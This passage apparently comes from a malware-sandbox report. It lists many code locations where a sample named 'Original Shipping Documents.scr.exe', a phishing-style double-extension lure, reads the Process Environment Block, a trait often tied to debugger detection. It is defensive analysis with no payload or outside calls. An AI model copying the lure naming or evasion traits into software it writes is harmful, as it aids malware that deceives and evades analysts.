Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD80A8 mov eax, dword ptr fs:[00000030h]	8_2_01AD80A8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B060B8 mov eax, dword ptr fs:[00000030h]	8_2_01B060B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B060B8 mov ecx, dword ptr fs:[00000030h]	8_2_01B060B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4208A mov eax, dword ptr fs:[00000030h]	8_2_01A4208A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A0E3 mov ecx, dword ptr fs:[00000030h]	8_2_01A3A0E3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC60E0 mov eax, dword ptr fs:[00000030h]	8_2_01AC60E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A480E9 mov eax, dword ptr fs:[00000030h]	8_2_01A480E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C0F0 mov eax, dword ptr fs:[00000030h]	8_2_01A3C0F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A820F0 mov ecx, dword ptr fs:[00000030h]	8_2_01A820F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC20DE mov eax, dword ptr fs:[00000030h]	8_2_01AC20DE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A020 mov eax, dword ptr fs:[00000030h]	8_2_01A3A020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C020 mov eax, dword ptr fs:[00000030h]	8_2_01A3C020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD6030 mov eax, dword ptr fs:[00000030h]	8_2_01AD6030
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC4000 mov ecx, dword ptr fs:[00000030h]	8_2_01AC4000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E016 mov eax, dword ptr fs:[00000030h]	8_2_01A5E016
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E016 mov eax, dword ptr fs:[00000030h]	8_2_01A5E016
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E016 mov eax, dword ptr fs:[00000030h]	8_2_01A5E016
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E016 mov eax, dword ptr fs:[00000030h]	8_2_01A5E016
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6C073 mov eax, dword ptr fs:[00000030h]	8_2_01A6C073
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A42050 mov eax, dword ptr fs:[00000030h]	8_2_01A42050
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC6050 mov eax, dword ptr fs:[00000030h]	8_2_01AC6050
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6438F mov eax, dword ptr fs:[00000030h]	8_2_01A6438F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6438F mov eax, dword ptr fs:[00000030h]	8_2_01A6438F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3E388 mov eax, dword ptr fs:[00000030h]	8_2_01A3E388
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3E388 mov eax, dword ptr fs:[00000030h]	8_2_01A3E388
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3E388 mov eax, dword ptr fs:[00000030h]	8_2_01A3E388
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A38397 mov eax, dword ptr fs:[00000030h]	8_2_01A38397
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A38397 mov eax, dword ptr fs:[00000030h]	8_2_01A38397
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A38397 mov eax, dword ptr fs:[00000030h]	8_2_01A38397
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A503E9 mov eax, dword ptr fs:[00000030h]	8_2_01A503E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	8_2_01A5E3F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	8_2_01A5E3F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E3F0 mov eax, dword ptr fs:[00000030h]	8_2_01A5E3F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A763FF mov eax, dword ptr fs:[00000030h]	8_2_01A763FF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFC3CD mov eax, dword ptr fs:[00000030h]	8_2_01AFC3CD
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A3C0 mov eax, dword ptr fs:[00000030h]	8_2_01A4A3C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A483C0 mov eax, dword ptr fs:[00000030h]	8_2_01A483C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A483C0 mov eax, dword ptr fs:[00000030h]	8_2_01A483C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A483C0 mov eax, dword ptr fs:[00000030h]	8_2_01A483C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A483C0 mov eax, dword ptr fs:[00000030h]	8_2_01A483C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC63C0 mov eax, dword ptr fs:[00000030h]	8_2_01AC63C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	8_2_01AEE3DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	8_2_01AEE3DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE3DB mov ecx, dword ptr fs:[00000030h]	8_2_01AEE3DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE3DB mov eax, dword ptr fs:[00000030h]	8_2_01AEE3DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE43D4 mov eax, dword ptr fs:[00000030h]	8_2_01AE43D4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE43D4 mov eax, dword ptr fs:[00000030h]	8_2_01AE43D4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7A30B mov eax, dword ptr fs:[00000030h]	8_2_01A7A30B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7A30B mov eax, dword ptr fs:[00000030h]	8_2_01A7A30B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7A30B mov eax, dword ptr fs:[00000030h]	8_2_01A7A30B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C310 mov ecx, dword ptr fs:[00000030h]	8_2_01A3C310
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A60310 mov ecx, dword ptr fs:[00000030h]	8_2_01A60310
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE437C mov eax, dword ptr fs:[00000030h]	8_2_01AE437C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0A352 mov eax, dword ptr fs:[00000030h]	8_2_01B0A352
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC2349 mov eax, dword ptr fs:[00000030h]	8_2_01AC2349
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov eax, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov eax, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov eax, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov ecx, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov eax, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC035C mov eax, dword ptr fs:[00000030h]	8_2_01AC035C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE8350 mov ecx, dword ptr fs:[00000030h]	8_2_01AE8350
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A502A0 mov eax, dword ptr fs:[00000030h]	8_2_01A502A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A502A0 mov eax, dword ptr fs:[00000030h]	8_2_01A502A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov ecx, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD62A0 mov eax, dword ptr fs:[00000030h]	8_2_01AD62A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E284 mov eax, dword ptr fs:[00000030h]	8_2_01A7E284
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E284 mov eax, dword ptr fs:[00000030h]	8_2_01A7E284
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC0283 mov eax, dword ptr fs:[00000030h]	8_2_01AC0283
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC0283 mov eax, dword ptr fs:[00000030h]	8_2_01AC0283
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC0283 mov eax, dword ptr fs:[00000030h]	8_2_01AC0283
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A502E1 mov eax, dword ptr fs:[00000030h]	8_2_01A502E1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A502E1 mov eax, dword ptr fs:[00000030h]	8_2_01A502E1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A502E1 mov eax, dword ptr fs:[00000030h]	8_2_01A502E1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	8_2_01A4A2C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	8_2_01A4A2C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	8_2_01A4A2C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	8_2_01A4A2C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4A2C3 mov eax, dword ptr fs:[00000030h]	8_2_01A4A2C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3823B mov eax, dword ptr fs:[00000030h]	8_2_01A3823B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A44260 mov eax, dword ptr fs:[00000030h]	8_2_01A44260
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A44260 mov eax, dword ptr fs:[00000030h]	8_2_01A44260
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A44260 mov eax, dword ptr fs:[00000030h]	8_2_01A44260
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3826B mov eax, dword ptr fs:[00000030h]	8_2_01A3826B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274 mov eax, dword ptr fs:[00000030h]	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC8243 mov eax, dword ptr fs:[00000030h]	8_2_01AC8243
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC8243 mov ecx, dword ptr fs:[00000030h]	8_2_01AC8243
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A250 mov eax, dword ptr fs:[00000030h]	8_2_01A3A250
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46259 mov eax, dword ptr fs:[00000030h]	8_2_01A46259
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	8_2_01AC05A7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	8_2_01AC05A7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC05A7 mov eax, dword ptr fs:[00000030h]	8_2_01AC05A7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A645B1 mov eax, dword ptr fs:[00000030h]	8_2_01A645B1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A645B1 mov eax, dword ptr fs:[00000030h]	8_2_01A645B1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A42582 mov eax, dword ptr fs:[00000030h]	8_2_01A42582
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A42582 mov ecx, dword ptr fs:[00000030h]	8_2_01A42582
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74588 mov eax, dword ptr fs:[00000030h]	8_2_01A74588
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E59C mov eax, dword ptr fs:[00000030h]	8_2_01A7E59C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]	8_2_01A6E5E7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A425E0 mov eax, dword ptr fs:[00000030h]	8_2_01A425E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7C5ED mov eax, dword ptr fs:[00000030h]	8_2_01A7C5ED
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7C5ED mov eax, dword ptr fs:[00000030h]	8_2_01A7C5ED
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E5CF mov eax, dword ptr fs:[00000030h]	8_2_01A7E5CF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E5CF mov eax, dword ptr fs:[00000030h]	8_2_01A7E5CF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A465D0 mov eax, dword ptr fs:[00000030h]	8_2_01A465D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]	8_2_01A7A5D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]	8_2_01A7A5D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535 mov eax, dword ptr fs:[00000030h]	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E53E mov eax, dword ptr fs:[00000030h]	8_2_01A6E53E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E53E mov eax, dword ptr fs:[00000030h]	8_2_01A6E53E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E53E mov eax, dword ptr fs:[00000030h]	8_2_01A6E53E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E53E mov eax, dword ptr fs:[00000030h]	8_2_01A6E53E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6E53E mov eax, dword ptr fs:[00000030h]	8_2_01A6E53E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD6500 mov eax, dword ptr fs:[00000030h]	8_2_01AD6500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B14500 mov eax, dword ptr fs:[00000030h]	8_2_01B14500
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7656A mov eax, dword ptr fs:[00000030h]	8_2_01A7656A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7656A mov eax, dword ptr fs:[00000030h]	8_2_01A7656A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7656A mov eax, dword ptr fs:[00000030h]	8_2_01A7656A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A48550 mov eax, dword ptr fs:[00000030h]	8_2_01A48550
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A48550 mov eax, dword ptr fs:[00000030h]	8_2_01A48550
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A464AB mov eax, dword ptr fs:[00000030h]	8_2_01A464AB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A744B0 mov ecx, dword ptr fs:[00000030h]	8_2_01A744B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ACA4B0 mov eax, dword ptr fs:[00000030h]	8_2_01ACA4B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A404E5 mov ecx, dword ptr fs:[00000030h]	8_2_01A404E5
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3E420 mov eax, dword ptr fs:[00000030h]	8_2_01A3E420
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3E420 mov eax, dword ptr fs:[00000030h]	8_2_01A3E420
